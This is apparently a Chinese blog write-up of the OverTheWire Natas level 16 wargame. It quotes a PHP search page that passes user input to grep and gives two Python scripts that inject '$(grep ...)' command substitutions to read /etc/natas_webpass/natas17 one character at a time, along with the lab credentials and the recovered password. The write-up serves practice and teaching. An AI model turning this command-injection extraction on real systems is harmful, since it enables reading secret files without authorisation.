Natas-CTF-16練習(xí)測試

16.8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

  • 這道題目是考察當(dāng)命令執(zhí)行被過濾如下所示的源代碼中的字符跃闹,還可以這樣使用 $(command)
  • 查看源代碼可知可以在grep中嵌套grep
  • 例如:grep -i $(grep -i a natas17.txt) dictionary.txt
  • 最終可以類似這樣測試 $(grep a /etc/natas_webpass/natas17)abacus
  • 所以使用如下Python腳本
#!/usr/local/bin/python3
# -*- coding=utf-8 -*-
# Author: Xiaoyunqi

import requests
from string import ascii_lowercase
from string import ascii_uppercase

chars = ascii_lowercase + ascii_uppercase + "0123456789"
pwd = ""
isDone = False
# print(chars)

while not isDone:
    for char in chars:
        searchPattern = '^' + pwd + char
        r = requests.post("http://natas16.natas.labs.overthewire.org/index.php", data={'needle': '$(grep ' + searchPattern + ' /etc/natas_webpass/natas17)abacus'}, auth=('natas16','WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'))
        if b"abacus" not in r.content:
            pwd += char
            print('Character "' + char + '" found')
            break
    else:
        isDone = True
print (pwd)
  • 跑出來的最終結(jié)果如下:
Character "8" found
Character "P" found
Character "s" found
Character "3" found
Character "H" found
Character "0" found
Character "G" found
Character "W" found
Character "b" found
Character "n" found
Character "5" found
Character "r" found
Character "d" found
Character "9" found
Character "S" found
Character "7" found
Character "G" found
Character "m" found
Character "A" found
Character "d" found
Character "g" found
Character "Q" found
Character "N" found
Character "d" found
Character "k" found
Character "h" found
Character "P" found
Character "k" found
Character "q" found
Character "9" found
Character "c" found
Character "w" found
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
  • 另一個版本的Python代碼
#!/usr/local/bin/python3
# -*- coding=utf-8 -*-
# Author: Xiaoyunqi


import requests
from string import ascii_lowercase
from string import ascii_uppercase


url = "http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/"
key = ''
# char = ascii_lowercase + ascii_uppercase + "0123456789"
char = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
while len(key) < 32:
    for i in char:
        payload = {'needle':'$(grep ^'+key+i+'.* /etc/natas_webpass/natas17)wrong','submit':'Search'}
        req = requests.get(url=url,params=payload)
        if 'wrong' not in req.text:
            key += i

    print (key)
  • 源代碼
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>

Recomment

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末契讲,一起剝皮案震驚了整個濱河市畸裳,隨后出現(xiàn)的幾起案子缰犁,更是在濱河造成了極大的恐慌,老刑警劉巖怖糊,帶你破解...
    沈念sama閱讀 219,490評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件帅容,死亡現(xiàn)場離奇詭異,居然都是意外死亡伍伤,警方通過查閱死者的電腦和手機并徘,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來扰魂,“玉大人麦乞,你說我怎么就攤上這事∪捌溃” “怎么了姐直?”我有些...
    開封第一講書人閱讀 165,830評論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長蒋畜。 經(jīng)常有香客問我声畏,道長,這世上最難降的妖魔是什么姻成? 我笑而不...
    開封第一講書人閱讀 58,957評論 1 295
  • 正文 為了忘掉前任插龄,我火速辦了婚禮愿棋,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘均牢。我一直安慰自己糠雨,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,974評論 6 393
  • 文/花漫 我一把揭開白布徘跪。 她就那樣靜靜地躺著见秤,像睡著了一般。 火紅的嫁衣襯著肌膚如雪真椿。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,754評論 1 307
  • 那天乎澄,我揣著相機與錄音突硝,去河邊找鬼。 笑死置济,一個胖子當(dāng)著我的面吹牛解恰,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播浙于,決...
    沈念sama閱讀 40,464評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼护盈,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了羞酗?” 一聲冷哼從身側(cè)響起腐宋,我...
    開封第一講書人閱讀 39,357評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎檀轨,沒想到半個月后胸竞,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,847評論 1 317
  • 正文 獨居荒郊野嶺守林人離奇死亡参萄,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,995評論 3 338
  • 正文 我和宋清朗相戀三年卫枝,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片讹挎。...
    茶點故事閱讀 40,137評論 1 351
  • 序言:一個原本活蹦亂跳的男人離奇死亡校赤,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出筒溃,到底是詐尸還是另有隱情马篮,我是刑警寧澤,帶...
    沈念sama閱讀 35,819評論 5 346
  • 正文 年R本政府宣布铡羡,位于F島的核電站积蔚,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏烦周。R本人自食惡果不足惜尽爆,卻給世界環(huán)境...
    茶點故事閱讀 41,482評論 3 331
  • 文/蒙蒙 一怎顾、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧漱贱,春花似錦槐雾、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至崇摄,卻和暖如春擎值,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背逐抑。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評論 1 272
  • 我被黑心中介騙來泰國打工鸠儿, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人厕氨。 一個月前我還...
    沈念sama閱讀 48,409評論 3 373
  • 正文 我出身青樓进每,卻偏偏與公主長得像,于是被迫代替她去往敵國和親命斧。 傳聞我的和親對象是個殘疾皇子田晚,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,086評論 2 355

推薦閱讀更多精彩內(nèi)容